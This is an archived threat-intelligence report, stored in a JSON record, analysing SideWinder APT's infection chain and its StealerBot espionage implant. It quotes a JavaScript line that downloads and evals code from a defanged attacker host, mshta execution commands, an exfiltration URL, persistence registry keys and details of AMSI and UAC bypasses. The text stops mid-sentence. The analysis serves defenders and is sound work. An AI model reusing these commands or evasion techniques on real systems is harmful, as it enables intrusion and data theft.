{ "id": "eb97cac9-a8da-45dd-976b-eb3e24f1e795", "created_at": "2026-04-06T00:22:22.651846Z", "updated_at": "2026-04-10T03:37:20.372209Z", "deleted_at": null, "sha1_hash": "cd734a8f8f6349cf28a379073393fcb8747f4b22", "title": "Beyond the Surface: the evolution and expansion of the SideWinder APT group", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1426770, "plain_text": "Beyond the Surface: the evolution and expansion of the SideWinder APT\r\ngroup\r\nBy Giampaolo Dedola\r\nPublished: 2024-10-15 · Archived: 2026-04-05 15:39:45 UTC\r\nSideWinder, aka T-APT-04 or RattleSnake, is one of the most prolific APT groups that began its activities in 2012 and was\r\nfirst publicly mentioned by us in 2018. Over the years, the group has launched attacks against high-profile entities in South\r\nand Southeast Asia. Its primary targets have been military and government entities in Pakistan, Sri Lanka, China and Nepal.\r\nOver the years, SideWinder has carried out an impressive number of attacks and its activities have been extensively\r\ndescribed in various analyses and reports published by different researchers and vendors (for example, here, here and here),\r\none of the latest of which was released at the end of July 2024. The group may be perceived as a low-skilled actor due to the\r\nuse of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true\r\ncapabilities only become apparent when you carefully examine the details of their operations.\r\nDespite years of observation and study, knowledge of their post-compromise activities remains limited.\r\nDuring our investigation, we observed new waves of attacks that showed a significant expansion of the group’s activities.\r\nThe attacks began to impact high-profile entities and strategic infrastructures in the Middle East and Africa, and we also\r\ndiscovered a previously unknown post-exploitation toolkit called “StealerBot”, an advanced modular implant designed\r\nspecifically for espionage activities that we currently believe is the main post-exploitation tool used by SideWinder on\r\ntargets of interest.\r\nSideWinder’s most recent campaign schema\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 1 of 26\n\nInfection vectors\r\nThe SideWinder attack chain typically starts with a spear-phishing email with an attachment, usually a Microsoft OOXML\r\ndocument (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. The document or LNK file\r\nstarts a multi-stage infection chain with various JavaScript and .NET downloaders, which ends with the installation of the\r\nStealerBot espionage tool.\r\nThe documents often contain information obtained from public websites, which is used to lure the victim into opening the\r\nfile and believing it to be legitimate. For example, the file in the image contains data downloaded from the following URL:\r\nhttps://nasc.org.np/news/closing-ceremony-training-program-financial-management-and-audit-officials-nepal-oil\r\nSnippet of the file 71F11A359243F382779E209687496EE2, “Nepal Oil Corporation (NOC).docx”\r\nThe contents of the file are selected specifically for the target and changed depending on the target’s country.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 2 of 26\n\nAll the documents use the remote template injection technique to download an RTF file that is stored on a remote server\r\ncontrolled by the attacker.\r\nRTF exploit\r\nRTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in\r\nMicrosoft Office software.\r\nThe attacker embedded shellcode designed to execute JavaScript code using the “RunHTMLApplication” function available\r\nin the “mshtml.dll” Windows library.\r\nThe shellcode uses different tricks to avoid sandboxes and complicate analysis.\r\nIt uses GlobalMemoryStatusEx to determine the size of RAM memory. If the size is less than 2GB, it terminates\r\nexecution.\r\nIt uses the CPUID instruction to obtain information about the processor manufacturer. If the CPU is not from Intel or\r\nAMD, it terminates execution.\r\nIt attempts to load the “dotnetlogger32.dll” library. If the file is present on the system, it terminates execution.\r\nThe malware uses different strings to load libraries and functions required for execution. These strings are truncated and the\r\nmissing part is added at runtime by patching the bytes. The strings are also mixed inside the code, which is adapted to skip\r\nthem and jump to valid instructions during execution, to make analysis more difficult.\r\nThe strings are passed as arguments to a function that performs the same action as “GetProcAddress”: it gets the address of\r\nan exported function. To do this, it receives two arguments: a base address of a library that exports the function, and the\r\nname of the exported function.\r\nThe first argument is passed with the standard push instruction, which loads the library address to the stack. The second\r\nargument is passed indirectly using a CALL instruction.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 3 of 26\n\nPassing necessary arguments\r\nThe loaded functions are then used to perform the following actions:\r\n1. 1 Load the “mshtml.dll” library and get the pointer to the “RunHTMLApplication” function.\r\n2. 2 Get a pointer to the current command line using the “GetCommandLineW” function.\r\n3. 3 Decrypt a script written in JavaScript that is embedded in the shellcode and encoded with XOR using “0x12” as the\r\nkey.\r\n4. 4 Overwrite the current process command line with the decoded JavaScript.\r\n5. 5 Call the “RunHTMLApplication” function, which will execute the code specified in the process command line.\r\nThe loaded JavaScript downloads and executes additional script code from a remote website.\r\njavascript:eval(\"v=ActiveXObject;x=new v(\\\"WinHttp.WinHttpRequest.5.1\\\");x.open(\\\"GET\\\",\r\n\\\"hxxps://mofa-gov-sa.direct888[.]net/015094_consulategz\\\",false);x.Send();eval(x.ResponseText);window.close()\")\r\nInitial infection LNK\r\nDuring the investigation we also observed another infection vector delivered via a spear-phishing email with a ZIP file\r\nattached. The ZIP archive is distributed with names intended to trick the victim into opening the file. The attacker frequently\r\nuses names that refer to important events such as the Hajj, the annual Islamic pilgrimage to Mecca.\r\nThe archive usually contains an LNK file with the same name as the archive. For example:\r\nZIP filename LNK filename\r\nmoavineen-e-hujjaj hajj-2024.zip MOAVINEEN-E-HUJJAJ HAJJ-2024.docx.lnk\r\nNIMA Invitation.zip NIMA Invitation.doc.lnk\r\nSpecial Envoy Speech at NCA.zip Special Envoy Speech at NCA.jpg .lnk\r\nදිනදි සං ශෝ ධන කර ගැ නිම.zip (Amending dates) දිනදි සං ශෝ ධන කර ගැ නිම .lnk\r\noffer letter.zip offer letter.docx.lnk\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 4 of 26\n\nThe LNK file points to the “mshta.exe” utility, which is used to execute JavaScript code hosted on a malicious website\r\ncontrolled by the attacker.\r\nBelow are the configuration values extracted from one of these LNK files:\r\nLocal Base Path : C:\\Windows\\System32\\sshtw.png\r\nDescription : MOAVINEEN-E-HUJJAJ HAJJ-2024.docx\r\nRelative Path : ..\\..\\..\\Windows\\System32\\calca.exe\r\nLink Target: C:\\Windows\\System32\\mshta.exe\r\nWorking Directory : C:\\Windows\\System32\r\nCommand Line Arguments : \"hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0\"\r\nIcon File Name : %systemroot%\\System32\\moricons.dll\r\nMachine ID : desktop-84bs21b\r\nDownloader module\r\nThe RTF exploits and LNK files execute the same JavaScript malware. This script decodes an embedded payload that is\r\nstored as a base64-encoded string. The payload is a .NET library named “App.dll”, which is then invoked by the script.\r\nJavaScript loader (beautified)\r\nApp.dll is a simple downloader or dropper configured to retrieve another .NET payload from a remote URL passed as an\r\nargument by the JavaScript, or to decode and execute another payload passed as an argument.\r\nThe library should be executed by invoking the “Programs.Work()” method, which can receive three arguments as input. We\r\nnamed the inputs as follows:\r\nArgument Argument description\r\nC2_URL An optional argument that can be used to pass a URL used to download a remote payload.\r\nPayload_filename\r\nAn optional argument that can be used together with the “Payload_Data” argument to create a file\r\non the local filesystem that will contain the dropped payload.\r\nPayload_data\r\nAn optional argument that can be used to pass an encoded payload that should be dropped on the\r\nlocal filesystem.\r\nApp.dll starts by collecting information about installed endpoint security products. In particular, Avast and AVG solutions\r\nare of interest to the malware. The collected data are sent to the C2. Then, if the “Payload_data” argument is not “Null”, it\r\ndecodes and decompresses the data using base64 and Gzip. The resulting payload is stored in the user’s Temp directory\r\nusing the filename specified in the “Payload_filename” argument.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 5 of 26\n\nIf Avast or AVG solutions are installed, the content of the dropped file is executed with the following command:\r\nmshta.exe \"javascript:WshShell = new\r\nActiveXObject(\"WScript.Shell\");WshShell.Run(\"%TEMP%\\%Payload_filename%\", 1,\r\nfalse);window.close()\r\nOtherwise, it will be executed with the following command:\r\npcalua.exe -a %TEMP%\\%Payload_filename%\r\nIf the attacker provides a C2_URL, the malware attempts to download another payload from the specified remote URL. The\r\nobtained data is decoded with an XOR algorithm using the first 32 bytes of the received payload as the key.\r\nThe resulting file should be .NET malware named “ModuleInstaller.dll”.\r\nModuleInstaller\r\nThe ModuleInstaller malware is a downloader used to deploy the Trojan used to maintain a foothold on compromised\r\nmachines, a malicious component we dubbed “Backdoor loader module”. We have been observing this specific component\r\nsince 2020, but previously we only described it in our private intelligence reports.\r\nModuleInstaller was designed to drop at least four files: a legitimate and signed application used to sideload a malicious\r\nlibrary, a .config manifest embedded in the program as a resource and required by the next stage to properly load additional\r\nmodules, a malicious library, and an encrypted payload. We observed various combinations of the dropped files, the most\r\ncommon being:\r\n%Malware Directory%\\vssvc.exe\r\n%Malware Directory%\\%encryptedfile%\r\n%Malware Directory%\\vsstrace.dll\r\n%Malware Directory%\\vssvc.exe.config\r\nor\r\n%Malware Directory%\\WorkFolders.exe\r\n%Malware Directory%\\%encryptedfile%\r\n%Malware Directory%\\propsys.dll\r\n%Malware Directory%\\WorkFolders.exe.config\r\nModuleInstaller embeds the following resources:\r\nResource name MD5 Description\r\nInterop_TaskScheduler_x64 95a49406abce52a25f0761f92166c18a\r\nInterop.TaskScheduler.dll for 64-bit systems\r\nused to create Windows Scheduled Tasks\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 6 of 26\n\nInterop_TaskScheduler_x86 dfe750747517747afa2cee76f2a0f8e4\r\nInterop.TaskScheduler.dll for 32-bit systems\r\nused to create Windows Scheduled Tasks\r\nmanifest d3136d7151f60ec41a370f4743c2983b XML manifest dropped as .config file\r\nPeLauncher 22e3a5970ae84c5f68b98f3b19dd980b .NET program not used in the code\r\nshellcode 32fc462f80b44013caeada725db5a2d1\r\nShellcode used to load libraries, which exports\r\na function named “Start”\r\nStealerBot_CppInstaller a107f27e7e9bac7c38e7778d661b78ac\r\nC++ library used to download two malicious\r\nlibraries and create persistence points\r\nThe downloader is configured to receive a URL as input and parse it to extract a specific value from a variable. The\r\nretrieved value is then compared with a list of string values that appear to be substrings of well-known endpoint security\r\nsolutions:\r\nPattern Endpoint Security Solution\r\nq=apn Unknown\r\naspers Kaspersky\r\nAfree McAfee (misspelled)\r\navast Avast\r\navg AVG\r\norton Norton\r\n360 360 Total Security\r\navir Avira\r\nModuleInstaller supports six infection routines, which differ in the techniques used to execute “Backdoor loader module” or\r\ndownload the components, but share similarities in the main logic. Some of these routines also include tricks to remove\r\nevidence, while others don’t. The malware only runs one specific routine chosen according to the value received as an\r\nargument and the value of an internal configuration embedded in the code.\r\nRoutine Conditions\r\nInfection Routine 1 Executed when substring “q=apn” is detected.\r\nInfection Routine 2 Executed when a specific byte of the internal config is equal to “1”.\r\nInfection Routine 3 Executed when the substring “360” is detected.\r\nInfection Routine 4 Executed when the substring “avast” or “avir” is detected.\r\nInfection Routine 5 Executed when the substring “aspers” or “Afree” is detected\r\nInfection Routine 6 Default case. Executed when all the other conditions are not satisfied.\r\nAll the routines collect information about the compromised system. Specifically, they collect:\r\nCurrent username;\r\nProcessor names and number of cores;\r\nPhysical disk name and size;\r\nThe values of the TotalVirtualMemorySize and TotalVisibleMemorySize properties;\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 7 of 26\n\nCurrent hostname;\r\nLocal IP address;\r\nInstalled OS;\r\nArchitecture.\r\nThe collected data are then encoded in base64 and concatenated with a C2 URL embedded in the code, inside a variable\r\nnamed “data”.\r\nhxxps://dynamic.nactagovpk[.]org/735e3a_download?data=\u003cstoleninfo\u003e\r\nThe malware has several C2 URLs embedded in the code, all of them encoded with base64 using a custom alphabet:\r\nC2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download\r\nC2_URL_2 = hxxps://dynamic.nactagovpk[.]org/0df7b2_download\r\nC2_URL_3 = hxxps://dynamic.nactagovpk[.]org/27419a_download\r\nC2_URL_4 = hxxps://dynamic.nactagovpk[.]org/ef1c4f_download\r\nThe malware sends the collected information to one of the C2 servers selected according to the specific infection routine.\r\nThe server response should be a payload with various configuration values.\r\nThe set of values may vary depending on the infection routine. The malware parses the received values and assigns them to\r\nlocal variables. In most cases the variable names cannot be obtained from the malware code. However, in one particular\r\ninfection routine the attacker used debug strings that allowed us to obtain most of these names. The table below contains the\r\nfull list of possible configuration values.\r\nVariable name Description\r\nMALWARE_DIRECTORY Directory path where all the malicious files are stored.\r\nLOAD_DLL_URL_X64 URL used to download the malicious library for 64-bit systems.\r\nLOAD_DLL_URL_X86 URL used to download the malicious library for 32-bit systems.\r\nLOAD_DLL_URL\r\nURL used to download the malicious library. Some infection routines do not check the\r\narchitecture.\r\nAPP_DLL_URL URL used to download the encrypted payload.\r\nHIJACK_EXE_URL URL used to download the legitimate application used to sideload the malicious library.\r\nRUN_KEY Name of the Windows Registry value that will be created to maintain persistence.\r\nHIJACK_EXE_NAME Name of the legitimate application.\r\nLOAD_DLL_NAME Name of the malicious library.\r\nMOD_LOAD_DLL_URL\r\nURL used to download an unknown library that is saved in the\r\nMALWARE_DIRECTORY as “IPHelper.dll”.\r\nThe payload is XORed twice. The keys are the first 32 bytes at the beginning of the payload.\r\nDuring execution, the malware logs the current infection status by sending GET requests to the C2. The analyzed sample\r\nused C2_URL_4 for this purpose. The request includes at least one variable named “data”, whose value indicates the\r\ninfection status.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 8 of 26\n\nVariable Description\r\n?data=1 Downloads completed.\r\n?data=2 Persistence point created.\r\n?data=3\u0026m=str Error. It also contains a variable “m” with information about the error.\r\n?data=4 Infection completed, but the next stage is not running.\r\n?data=5 Infection completed and the next stage is running.\r\nThe technique used to maintain persistence varies according to the infection routine selected by the malware, but generally\r\nrelies on the creation of new registry values under the HKCU Run key or the creation of Windows Scheduled Tasks.\r\nFor example:\r\nRegKey: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegValue: xcschemer (MALWARE_DIRECTORY)\r\nRegValueData: %AppData%\\xcschemer\\vssvc.exe (HIJACK_EXE_PATH)\r\nBackdoor loader module\r\nThe infection scheme described in the previous paragraph results in the installation of a malicious library that is sideloaded\r\nusing the legitimate and digitally signed application. The library acts as a loader that retrieves an encrypted payload dropped\r\nby ModuleInstaller, decrypts it and loads it in memory.\r\nThe Backdoor loader module has been observed since 2020, we covered it in our private APT reports. It has remained\r\nalmost the same over the years. It was recently updated by the attacker, but the main difference is that old variants are\r\nconfigured to load the encrypted file using a specific filename embedded in the program, and the latest variants were\r\ndesigned to enumerate all the files in the current directory and load those without an extension.\r\nThe library is usually highly obfuscated using the Control Flow Flattening technique. In addition, the strings, method names,\r\nand resource names are randomly modified with long strings, which makes the decoded code difficult to analyze. Moreover,\r\nsome relevant strings are stored inside a resource embedded in the program and encrypted with an XOR layer and Triple\r\nDES.\r\nThe malware also contains anti-sandbox techniques. It takes the current date and time and puts the thread to sleep for 100\r\nseconds. Sandboxes usually ignore the sleeping functions because they are often used by malware to generate long delays in\r\nexecution and avoid detection. Upon awakening, the malware retrieves again the current time and date and checks if the\r\nelapsed time is less than 90.5 seconds. If the condition is true, it terminates the execution.\r\nThe malware also attempts to avoid detection by patching the AmsiScanBuffer function in “amsi.dll” (Windows\r\nAntimalware Scan Interface). Specifically, it loads the “amsi.dll” library and parses the export directory to find the\r\n“AmsiScanBuffer” function. In this function, it changes the memory protection flags to modify instructions at RVA 0x337D\r\nto always return error code 0x80070057 (E_INVALIDARG – Invalid Argument). This change forces the “Amsi” protection\r\nto always return a scan result equal to 0, which is usually interpreted as AMSI_RESULT_CLEAN.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 9 of 26\n\nAmsiScanBuffer before patching\r\nAmsiScanBuffer after patching\r\nThe patched code is only one byte in size: the malware changes 0x74, which corresponds to the JZ (Jump if zero)\r\ninstruction, to 0x75, which corresponds to JNZ (Jump if not zero). The jump should be made when the buffer provided as\r\ninput to the AmsiScanBuffer function is invalid. With the modification, the jump will be made for all valid buffers.\r\nAfter patching AmsiScanBuffer, the malware performs a startup operation to achieve its main goal, which is to load another\r\npayload from the encrypted file. First, it enumerates files in the current directory and tries to find a file without the character\r\n‘.’ in the file name (i.e., without an extension). Then, if the file is found, it uses the first 16 bytes at the beginning of the file\r\nas the key and decodes the rest of the data using the XOR algorithm. Finally, it loads the data as a .NET assembly and\r\ninvokes the “Program.ctor” method.\r\nStealerBot\r\nStealerBot is a name assigned by the attacker to a modular implant developed with .NET to perform espionage activities. We\r\nnever observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader\r\nmodule. Prior to being loaded, the binary is stored in an encrypted file.\r\nThe implant consists of different modules loaded by the main “Orchestrator”, which is responsible for communicating with\r\nthe C2 and executing and managing the plugins. During the investigation, we discovered several plugins that were uploaded\r\non compromised victims and were used to:\r\nInstall additional malware;\r\nCapture screenshots;\r\nLog keystrokes;\r\nSteal passwords from browsers;\r\nIntercept RDP credentials;\r\nSteal files;\r\nStart reverse shell;\r\nPhish Windows credentials;\r\nEscalate privileges bypassing UAC.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 10 of 26\n\nModule IDs are included both in modules and in an encrypted configuration file. The Orchestrator uses them to manage the\r\ncomponents. It shares messages/commands with the modules, and can handle specific messages to kill or remove modules\r\nwith a particular ID.\r\nModule ID Description\r\n0xca Keylogger\r\n0xcb Live Console\r\n0xd0 Screenshot Grabber\r\n0xd4 File Stealer\r\n0xd6 UACBypass\r\n0xe0 RDP Credential Stealer\r\n0xe1 Token Grabber\r\n?? Credential Phisher\r\nStealerBot Orchestrator\r\nThe Orchestrator is usually loaded by the Backdoor loader module and is responsible for communicating with the C2 server,\r\nand executing and managing plugins. It periodically connects to two URLs to download modules provided by the attacker\r\nand upload files with stolen information. It also exchanges messages with the loaded module that can be used to provide or\r\nmodify configuration properties and unload specific components from the memory.\r\nOnce loaded into memory, the malware decodes a resource embedded in the Orchestrator called “Default”. The resource\r\ncontains a configuration file with the following structure:\r\nParameter\r\nParameter\r\ntype\r\nDescription\r\nConfig path String Location used to store the configuration file after first execution\r\nData directory String\r\nDirectory where the plugins store the output files that will be uploaded to\r\nthe remote C2\r\nC2 Modules String URL used to communicate with C2 server and retrieve additional plugins\r\nC2 Gateway String URL used to upload files generated by modules\r\nC2 Modules\r\nSleeptime\r\nInteger Sleep time between communications with “C2 Modules”\r\nC2 Gateway\r\nSleeptime\r\nInteger Sleep time between communications with “C2 Gateway”\r\nRSA_Key String RSA key used to encrypt communication with the C2 server\r\nNumber of plugins Integer Number of plugins embedded in the configuration\r\nModules Array Array which contains the modules\r\nThe configuration can embed multiple modules. By default, the array is usually empty, but after initial execution, the\r\nmalware creates a copy of the configuration in a local file and keeps it updated with information retrieved from the C2\r\nserver.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 11 of 26\n\nAfter parsing the configuration, the malware loads all the modules specified in the file. It then launches two threads to\r\ncommunicate with the remote C2 server. The first thread is used to communicate with the first URL that we dubbed “C2\r\nModules”, which is used to obtain new modules. The second thread is used to communicate with the URL we called “C2\r\nGateway”, which is used to upload the data generated by the modules.\r\nThe malware communicates with the C2 Modules server using GET requests. Before sending the request, it adds an “x”\r\nvalue that contains the list of modules already loaded by the agent.\r\n\u0026x[moduleId_1,moduleId_2,moduleId_3,etc.]\"\r\nThe server responds with a message composed of two parts, the header and the payload. Each part has a specific structure\r\nwith different information:\r\nMessage structure\r\nEach message is digitally signed with the RSA private key owned by the server-side attacker, and the signature is stored in\r\nthe “rgbSignature” value. The Orchestrator uses the “RSACryptoServiceProvider.VerifyHash” method to verify that the\r\nprovided digital signature is valid.\r\nThe header is encoded with the same XOR algorithm used to encode or decode the configuration file. The payload is\r\ncompressed using Gzip and encrypted using AES. The header contains the information needed to identify the module,\r\ndecrypt the payload, and verify the received data.\r\nWhen the module is loaded, the Orchestrator invokes the module main method, passing two arguments: the module ID and a\r\npipe handle. The pipe is used to maintain communication between the module and the Orchestrator.\r\nThe modules can send various messages to the Orchestrator to get or modify the configuration, send log messages, and\r\nterminate module execution. The messages function like commands, have a specific ID, and can include arguments.\r\nThe first byte of the message is its ID, which defines the request type:\r\nMessage\r\nID\r\nDescription\r\n0 Get settings: the Orchestrator creates a copy of the current configuration and sends it to the module.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 12 of 26\n\n1\r\nUpdate config: the module provides a new configuration and the Orchestrator updates the current\r\nconfiguration values and stores them in the local file.\r\n2\r\nUnload current module: the Orchestrator should unload the current module from the memory and close\r\nthe related pipes.\r\n3\r\nUnload module by ID: the Orchestrator should unload a module with the ID specified in the received\r\nrequest.\r\n4\r\nRemove startup: the Orchestrator should remove a module from the local configuration. The module ID\r\nis specified in the received request.\r\n5\r\nRemove current module from the configuration: the Orchestrator should remove the current module\r\nID from the local configuration.\r\n6\r\nTerminate current thread: the Orchestrator stops timers, pipes and removes the current module from\r\nthe current list of modules.\r\n7 Save log message: the Orchestrator saves a log message using the current module ID.\r\n8 Save log message: the Orchestrator saves a log message using the specified module ID.\r\n9 Get output folder configuration.\r\n10 Get C2 Modules URL: the Orchestrator shares the current C2 Modules URL with the module.\r\n11 Get C2 Gateway URL: the Orchestrator shares the current C2 Gateway URL with the module.\r\n12 Get RSA_Key public key.\r\nModules\r\nKeylogger\r\nThis module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and\r\nmonitor low-level keyboard and mouse input events. The malware can log keystrokes, mouse events, Windows clipboard\r\ncontents, and the title of the currently active window.\r\nScreenshot Grabber\r\nThis module periodically grabs screenshots of the primary screen.\r\nFile Stealer\r\nThe File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific\r\nextensions. By default, the list of extensions is as follows:\r\n.ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf\r\nBased on these values, we can conclude that this tool was developed to perform espionage activities by collecting files that\r\nusually contain sensitive information, such as Microsoft Office documents. It also searches for PPK files, which is the\r\nextension of files created by PuTTY to store private keys. PuTTY is an SSH and Telnet client commonly used on Windows\r\nOS to access remote systems.\r\nThe stolen data also includes information about the local drive and file attributes.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 13 of 26\n\nSnippet of code with the list of information collected by the File Stealer module\r\nLive Console\r\nThis library is configured to execute arbitrary commands on the compromised system. It can be used as a passive backdoor,\r\nlistening to the loopback interface, or as a reverse shell, connecting to the C2 to receive commands. The library can also\r\nprocess custom commands that provide the following capabilities:\r\nKill the module itself or its child processes;\r\nDownload additional files to compromised systems;\r\nAdd Windows Defender exclusions;\r\nInfect other users on the local system (requires high privileges);\r\nDownload and execute remote HTML applications;\r\nLoad arbitrary modules and extend malware capabilities.\r\nUnlike the other modules, Live Console communicates directly with a C2 whose address is embedded in the module’s code.\r\nBy default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and\r\nforwards the process output or error pipeline to the attacker.\r\nIf the infected OS is recent, i.e., Windows 10 build version greater than or equal to “17763”, the malware creates a\r\npseudoconsole to launch “cmd.exe”. Otherwise, it launches the same application using the “Process” class specified in\r\n“System.Diagnostics”.\r\nBefore forwarding the command to the console, the malware checks if the first byte of the received data has a specific value\r\nthat indicates the presence of a custom command. Below is a list of these values (command IDs) with descriptions of the\r\ncommands they identify.\r\nWindows\r\nbuild\r\nCommand\r\nID\r\nDescription\r\n \u003c  17763 3 Kill all child processes\r\n \u003c  17763 4\r\nKill the current module. Sends the message ID “2” to the Orchestrator to unload the\r\nmodule itself.\r\n \u003c  17763 16 Upload file to the infected system\r\n\u003e=  17763 1 Infect current logged-in user\r\n\u003e=  17763 2 Get current logged-in user\r\n\u003e=  17763 3 Download and execute a remote HTML application\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 14 of 26\n\n\u003e=  17763 4 Add directories to AV exclusions\r\n\u003e=  17763 5 Load a plugin\r\nMost of the commands are self-explanatory. We’d like to add a few words on the command with ID “1”, which is used to\r\ninfect other users on the same system whose profile is still “clean”. The malware infects the user by creating a copy of the\r\nsamples in the target user’s directory and creates a new registry value to ensure persistence.\r\nThis command is interesting because in the case of a specific error, the bot replies with the following message:\r\nInfected User is already logged in, use install dynx command from stealer bot\r\nfor installation\r\nCurrently, we don’t know what the dynx command represents, but the name “stealer bot” in this message and the name of\r\nthe resource embedded in the “ModuleInstaller”, “StealerBot_CppInstaller”, led us to conclude that the attacker named this\r\nmalware StealerBot.\r\nRDP Credential Stealer\r\nThis module consists of different components: a .NET library, shellcode, and a C++ library. It monitors running processes\r\nand injects malicious code into “mstsc.exe” to steal RDP credentials.\r\nmstsc.exe GUI\r\nMstsc.exe is the “Microsoft Terminal Service Client” process, which is the default RDP client on Windows. The malware\r\nmonitors the creation or termination of processes with the name “mstsc.exe”. When a new creation event is detected the\r\nmalware creates a new pipe with the static name “c63hh148d7c9437caa0f5850256ad32c” and injects malicious code into\r\nthe new process memory.\r\nThe injected code consists of different payloads that are embedded in the module as resources. The payloads are selected at\r\nruntime according to the system architecture, and merged before injection. The injected code is a shellcode that loads\r\nanother malicious library called “mscorlib”, written in C++ to steal RDP credentials by hooking specific functions of the\r\nWindows library “SspiCli.dll”. The library code appears to be based on open-source projects available on GitHub. It uses the\r\nMicrosoft Detours Package to add or remove the hooks to the following functions:\r\nSspiPrepareForCredRead;\r\nCryptProtectMemory;\r\nCredIsMarshaledCredentialW.\r\nThe three functions are hooked to obtain the server name, password, and username, respectively. The stolen data are sent to\r\nthe main module using the previously created pipe named “c63hh148d7c9437caa0f5850256ad32c”.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 15 of 26\n\nToken Grabber\r\nThe module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to\r\nFacebook, LinkedIn and Google services (Gmail, Google Drive, etc.). It has many code dependencies and starts by loading\r\nadditional legitimate and signed libraries whose functions it uses. These libraries are not present on the compromised system\r\nby default, so the malware has to drop and load them to function properly.\r\nLibrary Hash Description\r\nNewtonsoft.Json 52a7a3100310400e4655fb6cf204f024\r\nA popular high-performance JSON framework for\r\n.NET\r\nSystem.Data.SQLite fcb2bc2caf7456cd9c2ffab633c1aa0b An ADO.NET provider for SQLite\r\nSQLite_Interop_x64.dll 1b0114d4720af20f225e2fbd653cd296\r\nA library for 64-bit architectures required by\r\nSystem.Data.SQLite to work properly\r\nSQLite_Interop_x86.dll f72f57aa894f7efbef7574a9e853406d\r\nA library for 32-bit architectures required by\r\nSystem.Data.SQLite to work properly\r\nCredential Phisher\r\nThis module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the\r\nvictim.\r\nPhishing prompt\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 16 of 26\n\nSimilar to the RDP Credential Stealer, the malware creates a new pipe (“a21hg56ue2c2365cba1g9840256ad31c”) and injects\r\nmalicious shellcode into a targeted process, in this case “explorer.exe”. The shellcode loads a malicious library called\r\n“credsphisher.dll”, which uses the Windows function “CredUIPromptForWindowsCredentialsW” to display a phishing\r\nprompt to current users and trick victims into entering their Windows credentials.\r\nWhen the user enters the credentials, the malware uses the “LogonUserW” function to check that the username and\r\npassword provided are correct. If the user enters incorrect credentials, the malware continues to display the prompt until it\r\nreceives a valid password. Finally, upon successful credential validation, the malware writes the computer hostname,\r\nusername and password to a previously created pipe named “a21hg56ue2c2365cba1g9840256ad31c”.\r\nUACBypass\r\nThis module is a .NET library designed to bypass UAC and run malicious code with high privileges.\r\nThe library can achieve its goal using different bypass techniques, selected according to the Windows version and the\r\nsecurity solution installed on the infected machine. The malware embeds various resources containing different payloads\r\nused during malware execution.\r\nLibrary Hash Description\r\nCOMUacBypass 7f357621ba88a2a52b8146492364b6e0\r\nLibrary used to bypass UAC abusing\r\nIElevatedFactoryServer COM object\r\nmanifest d3136d7151f60ec41a370f4743c2983b XML manifest\r\nModule b0f0c29f4143605d5f958eba664cc295\r\nMalicious library used to download additional\r\nmalware\r\nReflectiveDllLoader f492b2d5431985078b85c78661e20c09 Shellcode to run libraries in memory\r\nVmComputeAgent ba2914b59c7ae08c346fc5a984dcc219 Program used for Slui UAC bypass technique\r\nVmComputeAgent_exe d3136d7151f60ec41a370f4743c2983b XML manifest\r\nBefore starting its execution, the malware checks certain conditions on the system, namely that UAC elevation doesn’t\r\nrequire admin credentials and that the infected user belongs to the ‘Administrator’ group. If both conditions are met, the\r\nmalware checks the Windows version and drops some artifacts according to the obtained values.\r\nWindows Server or Windows NT 6\r\n%Temp%\\%TempFile% Copy of resource named “Module”\r\n%localappdata%\\Microsoft\\rundll32.exe\r\nCopy of the legitimate program\r\n“%systemroot%\\System32\\rundll32.exe”\r\n%localappdata%\\Microsoft\\rundll32.exe.config Copy of resource named “manifest”\r\nOther Windows versions\r\n%localappdata%\\Microsoft\\devobj.dll Copy of resource named “Module”\r\n%localappdata%\\Microsoft\\rdpclip.exe\r\nCopy of the legitimate program\r\n“%systemroot%\\System32\\rdpclip.exe”\r\nThe main goal of this component is to execute the resource named “Module”, which is a downloader, with high privileges.\r\nThe malware tries to use different UAC bypass techniques, which are selected according to the installed security solution.\r\nBy default, it tries to abuse the CMSTP (Windows Connection Manager Profile Installer) program. This legitimate program\r\nis abused with a technique discovered in 2017, where the attacker can pass a custom profile to execute arbitrary commands\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 17 of 26\n\nwith high privilege. The default bypass technique is used on all systems except those protected by Kaspersky or 360 Total\r\nSecurity.\r\nIf these security solutions are detected, the malware attempts to use a more recent UAC bypass technique discovered in\r\n2022, which abuses the “IElevatedFactoryServer” COM object.\r\nIn this case, the malware injects malicious shellcode into “explorer.exe”. The shellcode loads and executes a malicious\r\nlibrary that was stored in the resource named “COMUacBypass”. The library uses the “IElevatedFactoryServer” COM\r\nobject to register a new Windows task with the highest privileges, allowing the attacker to execute the command to run the\r\ndropped payload with elevated privileges.\r\nDuring the static analysis of the “UACBypass” module we noticed the presence of code that is not called or executed.\r\nSpecifically, we noticed a method named “KasperskyUACBypass” that implements another bypass technique that 